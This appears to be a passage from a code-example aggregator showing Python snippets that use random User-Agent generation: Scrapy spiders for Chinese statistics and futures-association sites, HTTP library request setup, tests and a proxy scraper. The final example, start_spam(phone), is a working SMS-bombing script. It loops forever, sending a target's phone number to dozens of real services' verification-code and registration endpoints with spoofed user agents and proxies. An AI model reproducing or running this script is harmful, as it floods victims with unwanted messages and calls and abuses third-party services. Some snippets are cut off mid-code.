 def __init__(self):
     """Create a requests ``Session`` whose User-Agent header is randomized."""
     self.session = Session()
     # Replace the session's default headers with a minimal dict carrying
     # only a freshly generated User-Agent.
     self.session.headers = {'User-Agent': generate_user_agent()}
Beispiel #39
0
class StatsZbHgjdSpider(scrapy.Spider):
    """Spider that walks the indicator ("zb") tree of the quarterly macro
    dataset ("hgjd") on data.stats.gov.cn via its getTree endpoint and
    yields every tree node as a plain dict.
    """
    name = 'StatsZbHgjdSpider'
    allowed_domains = ['data.stats.gov.cn']
    start_urls = ['http://data.stats.gov.cn/easyquery.htm?cn=C01']

    # Heavy throttling between requests (seconds).
    DOWNLOAD_DELAY =20

    # Endpoint that serves the indicator tree.
    get_tree_url = 'http://data.stats.gov.cn/easyquery.htm'

    # Top-level indicator categories used to seed the tree walk.
    root_zb = ['A01', 'A02', 'A03', 'A04', 'A05', 'A06']
    # root_zb = ['A01']

    # NOTE(review): root_param is a shared, mutable class attribute that is
    # overwritten per request below — concurrent requests may race on "id".
    root_param ={"dbcode":"hgjd","wdcode":"zb","m":"getTree"}

    user_agent = generate_user_agent()
    headers = {
    'Accept': 'text/plain, */*; q=0.01',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'keep-alive',
    # 'Content-Length': '38',
    'Content-Type': 'application/x-www-form-urlencoded',
    # 'Cookie': 'JSESSIONID=F57026E9795D5E42B04115AB1FC3F258; u=1; wzws_cid=7043b0f11490d1af13890c46dab3c77ff11815b0d6ed6e0bb208fba85822ed47ea9b8783a325b98ef76e90cfe4933255c2f6c6ab8c95edff8fd3105126e023a7',
    'Host': 'data.stats.gov.cn',
    'Origin': 'http://data.stats.gov.cn',
    'Referer': 'http://data.stats.gov.cn/easyquery.htm',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36',
    'X-Requested-With': 'XMLHttpRequest'}
    # Overwrite the hard-coded UA above with the randomly generated one.
    headers["User-Agent"]=user_agent

    def parse(self, response):
        """Issue one getTree request per root category."""
        for id in self.root_zb:
            self.root_param["id"] = id
            yield scrapy.FormRequest(url=(self.get_tree_url+"?"+urllib.parse.urlencode(self.root_param)),method='POST',headers=self.headers,callback=self.parse_content,dont_filter=True)
            # yield scrapy.FormRequest(url=self.get_tree_url, method='POST',
            #                          headers=self.headers,callback=self.parse_content,dont_filter=True)

    def parse_content(self, response):
        """Yield each returned tree node; recurse into nodes flagged isParent."""
        try:
            time.sleep(1)
            if 200 != response.status:
                print("res status not 200!")
            # print(str(response.body,"utf-8"))
            son_zb_arr = json.loads(str(response.body,"utf-8"))
            for key in son_zb_arr:
                # item = StatsZbSpiderItem()
                # item['dbcode'] = key['dbcode']
                # item['id'] = key['id']
                # item['isParent'] = key['isParent']
                # item['name'] = key['name']
                # item['pid'] = key['pid']
                # item['wdcode'] = key['wdcode']
                # print(key)
                if key['isParent']:
                    self.root_param["id"] = key["id"]
                    yield scrapy.FormRequest(url=(self.get_tree_url + "?" + urllib.parse.urlencode(self.root_param)),
                                             method='POST', headers=self.headers, callback=self.parse_content,
                                             dont_filter=True)
                yield key
        # NOTE(review): this swallows every error (including JSON decode
        # failures) and prints an empty line — consider logging the exception.
        except BaseException:
            print('')
Beispiel #40
0
    def process_config(self, grab):
        """
        Set up the pycurl instance with values from ``grab.config``.

        Translates the high-level Grab request configuration (url, method,
        request body, headers, cookies, proxy, auth, encoding, debug flags)
        into pycurl options on ``self.curl``.

        :param grab: Grab instance whose ``config`` dict drives the setup.
        :raises error.GrabInvalidUrl: if the configured url cannot be
            normalized.
        :raises error.GrabMisuseError: on inconsistent option combinations.
        """

        # Copy some config for future usage
        self.config_nobody = grab.config["nobody"]
        self.config_body_maxsize = grab.config["body_maxsize"]

        try:
            request_url = normalize_url(grab.config["url"])
        except Exception as ex:
            raise error.GrabInvalidUrl(u"%s: %s" % (six.text_type(ex), grab.config["url"]))

        # py3 hack
        if not six.PY3:
            request_url = make_str(request_url)

        self.curl.setopt(pycurl.URL, request_url)

        # Actually, FOLLOWLOCATION should always be 0
        # because redirect logic takes place in Grab.request method
        # BUT in Grab.Spider this method is not invoked
        # So, in Grab.Spider we still rely on Grab internal ability
        # to follow 30X Locations
        self.curl.setopt(pycurl.FOLLOWLOCATION, 1 if grab.config["follow_location"] else 0)
        self.curl.setopt(pycurl.MAXREDIRS, grab.config["redirect_limit"])
        self.curl.setopt(pycurl.CONNECTTIMEOUT, grab.config["connect_timeout"])
        self.curl.setopt(pycurl.TIMEOUT, grab.config["timeout"])
        # Force IPv4 resolution.
        self.curl.setopt(pycurl.IPRESOLVE, pycurl.IPRESOLVE_V4)
        # self.curl.setopt(pycurl.DNS_CACHE_TIMEOUT, 0)
        if not grab.config["connection_reuse"]:
            self.curl.setopt(pycurl.FRESH_CONNECT, 1)
            self.curl.setopt(pycurl.FORBID_REUSE, 1)

        self.curl.setopt(pycurl.NOSIGNAL, 1)
        self.curl.setopt(pycurl.HEADERFUNCTION, self.header_processor)

        # Response body destination: in-memory buffer or a file on disk.
        if grab.config["body_inmemory"]:
            self.curl.setopt(pycurl.WRITEFUNCTION, self.body_processor)
        else:
            if not grab.config["body_storage_dir"]:
                raise error.GrabMisuseError("Option body_storage_dir is not defined")
            self.setup_body_file(
                grab.config["body_storage_dir"],
                grab.config["body_storage_filename"],
                create_dir=grab.config["body_storage_create_dir"],
            )
            self.curl.setopt(pycurl.WRITEFUNCTION, self.body_processor)

        if grab.config["verbose_logging"]:
            self.verbose_logging = True

        # User-Agent
        # Priority: explicit value > random line from user_agent_file >
        # a freshly generated one.
        if grab.config["user_agent"] is None:
            if grab.config["user_agent_file"] is not None:
                with open(grab.config["user_agent_file"]) as inf:
                    lines = inf.read().splitlines()
                grab.config["user_agent"] = random.choice(lines)
            else:
                grab.config["user_agent"] = generate_user_agent()

        # If value is None then set empty string
        # None is not acceptable because in such case
        # pycurl will set its default user agent "PycURL/x.xx.x"
        if not grab.config["user_agent"]:
            grab.config["user_agent"] = ""

        self.curl.setopt(pycurl.USERAGENT, grab.config["user_agent"])

        if grab.config["debug"]:
            self.curl.setopt(pycurl.VERBOSE, 1)
            self.curl.setopt(pycurl.DEBUGFUNCTION, self.debug_processor)

        # Ignore SSL errors
        self.curl.setopt(pycurl.SSL_VERIFYPEER, 0)
        self.curl.setopt(pycurl.SSL_VERIFYHOST, 0)

        # Disabled to avoid SSL3_READ_BYTES:sslv3 alert handshake failure error
        # self.curl.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3)

        # Body-carrying methods must have a body configured.
        # NOTE(review): bare GrabMisuseError here vs error.GrabMisuseError
        # elsewhere in this method — confirm both names are in scope.
        if grab.request_method in ("POST", "PUT"):
            if grab.config["post"] is None and grab.config["multipart_post"] is None:
                raise GrabMisuseError(
                    "Neither `post` or `multipart_post`"
                    " options was specified for the %s"
                    " request" % grab.request_method
                )

        if grab.request_method == "POST":
            self.curl.setopt(pycurl.POST, 1)
            if grab.config["multipart_post"]:
                if isinstance(grab.config["multipart_post"], six.string_types):
                    raise error.GrabMisuseError("multipart_post option could not be a string")
                post_items = normalize_http_values(
                    grab.config["multipart_post"],
                    charset=grab.config["charset"],
                    ignore_classes=(UploadFile, UploadContent),
                )
                # py3 hack
                if six.PY3:
                    post_items = decode_pairs(post_items, grab.config["charset"])
                # import pdb; pdb.set_trace()
                self.curl.setopt(pycurl.HTTPPOST, process_upload_items(post_items))
            elif grab.config["post"]:
                post_data = normalize_post_data(grab.config["post"], grab.config["charset"])
                # py3 hack
                # if six.PY3:
                #    post_data = smart_unicode(post_data,
                #                              grab.config['charset'])
                self.curl.setopt(pycurl.POSTFIELDS, post_data)
            else:
                # POST with an explicitly empty body.
                self.curl.setopt(pycurl.POSTFIELDS, "")
        elif grab.request_method == "PUT":
            data = grab.config["post"]
            if isinstance(data, six.text_type):
                # py3 hack
                # if six.PY3:
                #    data = data.encode('utf-8')
                # else:
                raise error.GrabMisuseError("Value of post option could be only " "byte string if PUT method is used")
            self.curl.setopt(pycurl.UPLOAD, 1)
            self.curl.setopt(pycurl.CUSTOMREQUEST, "PUT")
            self.curl.setopt(pycurl.READFUNCTION, StringIO(data).read)
            self.curl.setopt(pycurl.INFILESIZE, len(data))
        elif grab.request_method == "PATCH":
            data = grab.config["post"]
            if isinstance(data, six.text_type):
                raise error.GrabMisuseError("Value of post option could be only byte " "string if PATCH method is used")
            self.curl.setopt(pycurl.UPLOAD, 1)
            self.curl.setopt(pycurl.CUSTOMREQUEST, "PATCH")
            self.curl.setopt(pycurl.READFUNCTION, StringIO(data).read)
            self.curl.setopt(pycurl.INFILESIZE, len(data))
        elif grab.request_method == "DELETE":
            self.curl.setopt(pycurl.CUSTOMREQUEST, "DELETE")
        elif grab.request_method == "HEAD":
            self.curl.setopt(pycurl.NOBODY, 1)
        elif grab.request_method == "UPLOAD":
            self.curl.setopt(pycurl.UPLOAD, 1)
        elif grab.request_method == "GET":
            self.curl.setopt(pycurl.HTTPGET, 1)
        elif grab.request_method == "OPTIONS":
            data = grab.config["post"]
            if data is not None:
                if isinstance(data, six.text_type):
                    raise error.GrabMisuseError(
                        "Value of post option could be only byte " "string if PATCH method is used"
                    )
                self.curl.setopt(pycurl.UPLOAD, 1)
                self.curl.setopt(pycurl.READFUNCTION, StringIO(data).read)
                self.curl.setopt(pycurl.INFILESIZE, len(data))
            self.curl.setopt(pycurl.CUSTOMREQUEST, "OPTIONS")
        else:
            raise error.GrabMisuseError("Invalid method: %s" % grab.request_method)

        # Merge common headers with per-request headers (per-request wins).
        headers = grab.config["common_headers"]
        if grab.config["headers"]:
            headers.update(grab.config["headers"])
        # This is required to avoid some problems
        headers.update({"Expect": ""})
        header_tuples = [str("%s: %s" % x) for x in headers.items()]
        self.curl.setopt(pycurl.HTTPHEADER, header_tuples)

        self.process_cookie_options(grab, request_url)

        if grab.config["referer"]:
            self.curl.setopt(pycurl.REFERER, str(grab.config["referer"]))

        # An empty string explicitly disables any previously set proxy.
        if grab.config["proxy"]:
            self.curl.setopt(pycurl.PROXY, str(grab.config["proxy"]))
        else:
            self.curl.setopt(pycurl.PROXY, "")

        if grab.config["proxy_userpwd"]:
            self.curl.setopt(pycurl.PROXYUSERPWD, str(grab.config["proxy_userpwd"]))

        if grab.config["proxy_type"]:
            # Map e.g. "socks5" -> pycurl.PROXYTYPE_SOCKS5.
            key = "PROXYTYPE_%s" % grab.config["proxy_type"].upper()
            self.curl.setopt(pycurl.PROXYTYPE, getattr(pycurl, key))

        if grab.config["encoding"]:
            if "gzip" in grab.config["encoding"] and "zlib" not in pycurl.version:
                raise error.GrabMisuseError(
                    "You can not use gzip encoding because " "pycurl was built without zlib support"
                )
            self.curl.setopt(pycurl.ENCODING, grab.config["encoding"])

        if grab.config["userpwd"]:
            self.curl.setopt(pycurl.USERPWD, str(grab.config["userpwd"]))

        if grab.config.get("interface") is not None:
            self.curl.setopt(pycurl.INTERFACE, grab.config["interface"])

        if grab.config.get("reject_file_size") is not None:
            self.curl.setopt(pycurl.MAXFILESIZE, grab.config["reject_file_size"])
Beispiel #41
0
def get_html(url):
    """Fetch *url* after a 1-second politeness delay and return the body text."""
    sleep(1)
    response = requests.get(
        url,
        headers={'Accept': '*/*', 'User-Agent': generate_user_agent()},
    )
    return response.text
Beispiel #42
0
# -*- coding: utf-8 -*-
from user_agent import generate_user_agent

# Scrapy project settings for the comentariosg1 crawler.
BOT_NAME = 'comentariosg1'

SPIDER_MODULES = ['comentariosg1.spiders']
NEWSPIDER_MODULE = 'comentariosg1.spiders'

# Random desktop User-Agent, generated once at settings-import time.
USER_AGENT = generate_user_agent(device_type=['desktop'])

# Obey robots.txt rules
ROBOTSTXT_OBEY = True

# Keep non-ASCII characters readable in exported feeds.
FEED_EXPORT_ENCODING = 'utf-8'
Beispiel #43
0
 def test_mac_chrome(self):
     """Mac + Chrome agents must carry an 'OS X <major>_<minor>[_<patch>]' token."""
     os_x_version = re.compile(r'OS X \d+_\d+(_\d+\b|\b)')
     for _ in range(100):
         agent = generate_user_agent(platform='mac', navigator='chrome')
         self.assertTrue(os_x_version.search(agent))
Beispiel #44
0
    def process_config(self, grab):
        """
        Build the transport ``Request`` object from ``grab.config``.

        Fills in url, method, timeouts, request body, proxy settings,
        User-Agent, headers and cookies, then stores the result in
        ``self._request`` for the actual network call.

        :param grab: Grab instance whose ``config`` dict drives the setup.
        :raises error.GrabInvalidUrl: if the configured url cannot be
            normalized.
        :raises GrabMisuseError: on inconsistent option combinations.
        """
        req = Request(data=None)

        try:
            request_url = normalize_url(grab.config['url'])
        except Exception as ex:
            raise error.GrabInvalidUrl(u'%s: %s' %
                                       (six.text_type(ex), grab.config['url']))
        req.url = request_url

        method = grab.detect_request_method()
        req.method = make_str(method)

        req.config_body_maxsize = grab.config['body_maxsize']
        req.config_nobody = grab.config['nobody']

        req.timeout = grab.config['timeout']
        req.connect_timeout = grab.config['connect_timeout']

        # Headers derived below (content type/length, UA) collected here
        # before being merged with configured headers.
        extra_headers = {}

        # Body processing
        if grab.config['body_inmemory']:
            pass
        else:
            # Responses go to a file on disk instead of memory.
            if not grab.config['body_storage_dir']:
                raise GrabMisuseError('Option body_storage_dir is not defined')
            file_, path_ = self.setup_body_file(
                grab.config['body_storage_dir'],
                grab.config['body_storage_filename'],
                create_dir=grab.config['body_storage_create_dir'])
            req.response_file = file_
            req.response_path = path_

        if grab.config['multipart_post'] is not None:
            post_data = grab.config['multipart_post']
            if isinstance(post_data, six.binary_type):
                # Already-encoded body is sent as-is.
                pass
            elif isinstance(post_data, six.text_type):
                raise GrabMisuseError('Option multipart_post data'
                                      ' does not accept unicode.')
            else:
                # Encode a sequence of (key, value) pairs as multipart/form-data.
                post_items = normalize_http_values(
                    grab.config['multipart_post'],
                    charset=grab.config['charset'],
                    ignore_classes=(UploadFile, UploadContent),
                )
                post_items = decode_pairs(post_items, grab.config['charset'])
                post_items = process_upload_items(post_items)
                post_data, content_type = encode_multipart_formdata(post_items)
                extra_headers['Content-Type'] = content_type
            extra_headers['Content-Length'] = len(post_data)
            req.data = post_data
        elif grab.config['post'] is not None:
            post_data = normalize_post_data(grab.config['post'],
                                            grab.config['charset'])
            # py3 hack
            # if six.PY3:
            #    post_data = smart_unicode(post_data,
            #                              grab.config['charset'])
            extra_headers['Content-Length'] = len(post_data)
            req.data = post_data

        # Body-carrying methods must have a body configured.
        if method in ('POST', 'PUT'):
            if (grab.config['post'] is None
                    and grab.config['multipart_post'] is None):
                raise GrabMisuseError('Neither `post` or `multipart_post`'
                                      ' options was specified for the %s'
                                      ' request' % method)
        # Proxy
        if grab.config['proxy']:
            req.proxy = grab.config['proxy']

        if grab.config['proxy_userpwd']:
            req.proxy_userpwd = grab.config['proxy_userpwd']

        if grab.config['proxy_type']:
            req.proxy_type = grab.config['proxy_type']
        else:
            req.proxy_type = 'http'

        # User-Agent
        # Priority: explicit value > random line from user_agent_file >
        # a freshly generated one.
        if grab.config['user_agent'] is None:
            if grab.config['user_agent_file'] is not None:
                with open(grab.config['user_agent_file']) as inf:
                    lines = inf.read().splitlines()
                grab.config['user_agent'] = random.choice(lines)
            else:
                grab.config['user_agent'] = generate_user_agent()

        extra_headers['User-Agent'] = grab.config['user_agent']

        # Headers
        # Merge order: derived headers < common headers < per-request headers.
        headers = extra_headers
        headers.update(grab.config['common_headers'])

        if grab.config['headers']:
            headers.update(grab.config['headers'])
        req.headers = headers

        # Cookies
        self.process_cookie_options(grab, req)

        self._request = req
Beispiel #45
0
 def test_navigator_option_tuple(self):
     """Tuples of navigator names must be accepted without raising."""
     for _ in range(100):
         generate_user_agent(navigator=('chrome', ))
         generate_user_agent(navigator=('chrome', 'firefox'))
         generate_user_agent(navigator=('chrome', 'firefox', 'ie'))
Beispiel #46
0
    def infoParse(self, response):
        """Parse one page of a paginated CFA info table.

        Yields one ``CfachinaItem`` per parsed row and, while pages remain,
        a follow-up ``scrapy.Request`` for the next page.

        :param response: page response; ``response.meta`` must carry
            ``currentPage``, ``organid``, ``callbacks``, ``selectType`` and
            (on pages after the first) ``totalPage``.
        """
        item = CfachinaItem()
        currentPage = response.meta['currentPage']
        organid = response.meta['organid']
        callbacks = response.meta['callbacks']
        selectType = response.meta['selectType']
        # On the first page, read the global totalPage from the page itself
        if currentPage == 1:
            totalPage = response.xpath(
                '//li[text()="共["]/span/text()').extract_first()
            totalPage = int(
                totalPage) if totalPage and totalPage.isdigit() else None
        # On later pages, take the global totalPage from meta
        else:

            totalPage = response.meta['totalPage']
        configs = Con.main(response.url)
        # Bug fix: was `is not ''` — identity comparison against a string
        # literal (SyntaxWarning, implementation-dependent); equality is meant.
        if configs['list']['v'] != '':
            res = S.select_content(response, configs['list'])
        else:
            res = [response]
        # res may be None; only parse rows when a selection succeeded
        if res is not None:
            for info in res:
                result = dict()
                for config in configs['data']:
                    k = config['En']
                    result[k] = S.select_content(info, config)
                    result[k] = S.replace_all(result[k])

    #            print(result)
                item['result'] = result
                item['keys'] = configs['list']['keys']
                item['db'] = configs['list']['db']
                yield item
        # If more pages remain (20 rows per page), request the next page
        if isinstance(totalPage, int) and currentPage < totalPage / 20:
            currentPage += 1
            data = {
                'organid': organid,
                'currentPage': str(currentPage),
                'pageSize': '20',
                'selectType': selectType
            }
            url = 'http://www.cfachina.org/cfainfo/organbaseinfoOneServlet?' + urllib.parse.urlencode(
                data)
            # NOTE(review): eval() on a meta-supplied callback name is fragile
            # and unsafe if meta is ever attacker-influenced; a dict mapping
            # names to bound methods would be safer.
            yield scrapy.Request(
                url,
                callback=eval(callbacks),
                headers={
                    'User-Agent':
                    generate_user_agent(os=('win', 'mac', 'linux'))
                },
                meta={
                    'currentPage': currentPage,
                    'totalPage': totalPage,
                    'organid': organid,
                    'callbacks': callbacks,
                    'selectType': selectType
                },
            )
Beispiel #47
0
def random_user_agent():
    """Refresh the module-level ``header`` dict with a new random User-Agent."""
    # `global` is not strictly needed for in-place mutation, but documents
    # that the shared module-level dict is being modified.
    global header
    header['User-Agent'] = generate_user_agent()
Beispiel #48
0
    def cdfQualificationListparse(self, response):
        """Parse the practitioner-qualification organisation list page.

        For every organisation row, schedules one request per info table
        (base info, history, branches, supervisors, personnel, shareholders,
        credit, financials, subordinated debt), then follows the next list
        page until ``cdfQualificationListTotalPages`` is reached.
        """
        #        '''save the page as a local html file (debugging aid)'''
        #        print(response.text)
        #        with open("1.html","wb") as f:
        #            f.write(response.body)
        # The total page count is read once, from the first page's pager.
        if self.page == 1:
            self.cdfQualificationListTotalPages = int(
                response.xpath('//ul[@class="yema"]/li[last()]/span/text()').
                extract_first())
        currentPage = 1
        for info in response.xpath(
                '//td[text()=" 机构编号 "]/parent::tr/following-sibling::tr'):
            # Get the organisation id and build the urls for the nine tables
            organid = info.xpath('td[1]/text()').extract_first()
            # Build the urls
            # Asset-management business -- logic not written yet
            #            data_ = {'organid':organid}
            #            yield scrapy.Request('http://www.cfachina.org/cfainfo/personOfAssetmanageinfoServlet?'+urllib.parse.urlencode(data_),
            #                                 meta = {'organid':organid},
            #                                 callback = self.infoParse1,
            #                                 headers = {'User-Agent':generate_user_agent(os=('win','mac','linux'))}
            #                                 )
            for selecttype in [{
                    't': 'organbaseinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'organhisinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'organbranchinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'supervisorinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'personinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'organshareholderinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'organcreditinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'organfinancialinfo',
                    'callback': 'self.infoParse'
            }, {
                    't': 'subdebtmonthinfo',
                    'callback': 'self.infoParse'
            }]:
                # urlencode builds the GET-style query string
                data = {
                    'organid': organid,
                    'currentPage': str(currentPage),
                    'pageSize': '20',
                    'selectType': selecttype['t']
                }
                url = 'http://www.cfachina.org/cfainfo/organbaseinfoOneServlet?' + urllib.parse.urlencode(
                    data)
                callbacks = selecttype['callback']
                selectType = selecttype['t']
                # Send the request
                yield scrapy.Request(url,
                                     meta={
                                         'currentPage': currentPage,
                                         'organid': organid,
                                         'callbacks': callbacks,
                                         'selectType': selectType
                                     },
                                     callback=eval(callbacks),
                                     headers={
                                         'User-Agent':
                                         generate_user_agent(os=('win', 'mac',
                                                                 'linux'))
                                     })

        # Follow the next organisation-list page, if any.
        if self.page < self.cdfQualificationListTotalPages:
            self.page += 1
            nextdata = self.madedata(self.page)
            nextheaders = {'User-Agent': generate_user_agent()}
            nexturl = 'http://www.cfachina.org/cfainfo/organbaseinfoServlet'
            yield scrapy.FormRequest(nexturl,
                                     method='POST',
                                     formdata=nextdata,
                                     headers=nextheaders,
                                     callback=self.cdfQualificationListparse)
Beispiel #49
0
import json
import os
import re
import time
from multiprocessing import Lock, Pool, Process, RLock

import requests
import user_agent
from requests.exceptions import RequestException

filename = 'result.txt'
# Resolve the output file next to this script, independent of the cwd.
file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), filename)

# Shared request headers with a random User-Agent, generated once at import.
headers = {'user-agent': user_agent.generate_user_agent()}


def get_one_page(url):
    """Download *url* and return its body text.

    Returns ``None`` on a non-200 status or on any request failure;
    progress is reported via ``print``.
    """
    try:
        response = requests.get(url, headers=headers)
        if response.status_code != 200:
            return None
        print("Download-Success {}".format(url))
        return response.text
    except RequestException:
        print("Download-Failed {}".format(url))
        return None


def parse_one_page(html):
    pattern = re.compile(
        '<dd>.*?board-index.*?>(\d+)</i>.*?' + 'data-src="(.*?)".*?' +
Beispiel #50
0
import os
import sys
# Make the project packages importable regardless of the working directory
# by adding this file's directory and up to three ancestor directories.
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))


from SpiderHelp import SpiderHelp
from RedisHelp import _Request,_RedisSpider,logger


# Module-wide crawl flags and constants.
conn_flag = False
REDISFLAG = True
# NOTE(review): `time` and `generate_user_agent` are not imported in this
# snippet — confirm they are provided by an import elsewhere in the file.
TODAY = time.strftime('%Y-%m-%d')
Headers = {'User-Agent': generate_user_agent(os=('win',))}
Cookies = {'.ASPXANONYMOUS':'pdtC5gfC0wEkAAAAOWIzZDNiMGEtYjUzOS00YzYyLWEyZTctNWM2OTdmOGM2ZDcz0'}
MAX = 2**15


def get_area():
    """Download 51job's area lookup table and return it as a dict.

    Fetches the JS file that embeds the ``area`` mapping and extracts the
    JSON object literal with a regex.
    """
    res = requests.get('http://js.51jobcdn.com/in/js/2016/layer/area_array_c.js?20171103')
    # Raw string fixes the invalid '\{' escape (DeprecationWarning on
    # modern Python); the pattern itself is unchanged.
    RESULT = json.loads(re.compile(r'area=(\{.*?\})', re.S).search(res.text).group(1))
    return RESULT



class SinaspiderSpider(_RedisSpider, SpiderHelp):  #,scrapy.Spider
    """Redis-backed spider for 51job, seeded from the downloaded area table."""
    name = '51job_test'
    # NOTE(review): get_area() returns a dict of area codes, not URLs —
    # confirm _RedisSpider accepts this shape for start_urls.
    start_urls = get_area()
    state = {}
Beispiel #51
0
import json
import logging
import time
from datetime import datetime as dt
from typing import Set

import brotli
import requests
from bs4 import BeautifulSoup
from user_agent import generate_user_agent

from .tools.proxies_manipulation import parse_proxies, short_url

logger = logging.getLogger(__name__)
standard_headers = {"User-Agent": generate_user_agent()}
timeout = 6


def proxy50_50() -> Set[str]:
    """Collect proxy addresses published on proxy50-50.blogspot.com.

    Best-effort: any fetch or parse failure is logged and whatever was
    collected so far (possibly an empty set) is returned.
    """
    proxies_set: Set[str] = set()
    url = "https://proxy50-50.blogspot.com/"
    try:
        r = requests.get(url, headers=standard_headers, timeout=timeout)
        proxies_set.update(parse_proxies(r.text))
        logger.info(
            f"From {short_url(r.url)} were parsed {len(proxies_set)} proxies")
    except Exception:
        logger.exception(f"Proxies from {short_url(url)} were not loaded :(")
    return proxies_set

Beispiel #52
0
def start_spam(phone):
    def format_phone(phone, phone_mask):
        phone_list = list(phone)
        for i in phone_list:
            phone_mask = phone_mask.replace("#", i, 1)
        return phone_mask

    name = ""
    for _ in range(12):
        name = name + choice(
            "123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM")
        password = name + choice(
            "123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM")
        email = name + "@gmail.com"
    phone9 = phone[1:]
    headers = {"User-Agent": generate_user_agent()}
    proxies = generate_proxy()
    while True:
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://zoloto585.ru/api/bcard/reg/",
                 json={
                     "name": "",
                     "surname": "",
                     "patronymic": "",
                     "sex": "m",
                     "birthdate": "..",
                     "phone": formatted_phone,
                     "email": "",
                     "city": ""
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone[1:], "8(###)###-##-##")
            post(
                "http://xn---72-5cdaa0cclp5fkp4ewc.xn--p1ai/user_account/ajax222.php?do=sms_code",
                data={"phone": formatted_phone},
                headers=headers)
        except:
            pass
        try:
            post("https://youla.ru/web-api/auth/request_code",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://yaponchik.net/login/login.php",
                 data={
                     "login": "******",
                     "countdown": "0",
                     "step": "phone",
                     "redirect": "/profile/",
                     "phone": formatted_phone,
                     "code": ""
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://eda.yandex/api/v1/user/request_authentication_code",
                 json={"phone_number": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.iconjob.co/api/auth/verification_code",
                 json={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://cabinet.wi-fi.ru/api/auth/by-sms",
                 data={"msisdn": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://ng-api.webbankir.com/user/v2/create",
                 json={
                     "lastName": "иванов",
                     "firstName": "иван",
                     "middleName": "иванович",
                     "mobilePhone": phone,
                     "email": email,
                     "smsCode": ""
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://shop.vsk.ru/ajax/auth/postSms/",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://passport.twitch.tv/register?trusted_request=true",
                 json={
                     "birthday": {
                         "day": 11,
                         "month": 11,
                         "year": 1999
                     },
                     "client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp",
                     "include_verification_code": True,
                     "password": password,
                     "phone_number": phone,
                     "username": name
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://b.utair.ru/api/v1/login/",
                 json={
                     "login": phone,
                     "confirmation_type": "call_code"
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "#(###)###-##-##")
            post("https://www.r-ulybka.ru/login/form_ajax.php",
                 data={
                     "action": "auth",
                     "phone": formatted_phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://uklon.com.ua/api/v1/account/code/send",
                 headers={
                     "client_id": "6289de851fc726f887af8d5d7a56c635",
                     "User-Agent": generate_user_agent()
                 },
                 json={"phone": phone})
        except:
            pass
        try:
            post("https://partner.uklon.com.ua/api/v1/registration/sendcode",
                 headers={
                     "client_id": "6289de851fc726f887af8d5d7a56c635",
                     "User-Agent": generate_user_agent()
                 },
                 json={"phone": phone})
        except:
            pass
        try:
            post("https://secure.ubki.ua/b2_api_xml/ubki/auth",
                 json={
                     "doc": {
                         "auth": {
                             "mphone": "+" + phone,
                             "bdate": "11.11.1999",
                             "deviceid": "00100",
                             "version": "1.0",
                             "source": "site",
                             "signature": "undefined"
                         }
                     }
                 },
                 headers={
                     "Accept": "application/json",
                     "User-Agent": generate_user_agent()
                 })
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://www.top-shop.ru/login/loginByPhone/",
                 data={"phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "8(###)###-##-##")
            post("https://topbladebar.ru/user_account/ajax222.php?do=sms_code",
                 data={"phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru",
                data={"phone_number": phone},
                headers=headers)
        except:
            pass
        try:
            post("https://m.tiktok.com/node-a/send/download_link",
                 json={
                     "slideVerify": 0,
                     "language": "ru",
                     "PhoneRegionCode": "7",
                     "Mobile": phone9,
                     "page": {
                         "pageName": "home",
                         "launchMode": "direct",
                         "trafficType": ""
                     }
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://thehive.pro/auth/signup",
                 json={"phone": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            post(f"https://msk.tele2.ru/api/validation/number/{phone}",
                 json={"sender": "Tele2"},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ### - ## - ##")
            post("https://www.taxi-ritm.ru/ajax/ppp/ppp_back_call.php",
                 data={
                     "RECALL": "Y",
                     "BACK_CALL_PHONE": formatted_phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://www.tarantino-family.com/wp-admin/admin-ajax.php",
                 data={
                     "action": "callback_phonenumber",
                     "phone": phone
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://lk.tabris.ru/reg/",
                 data={
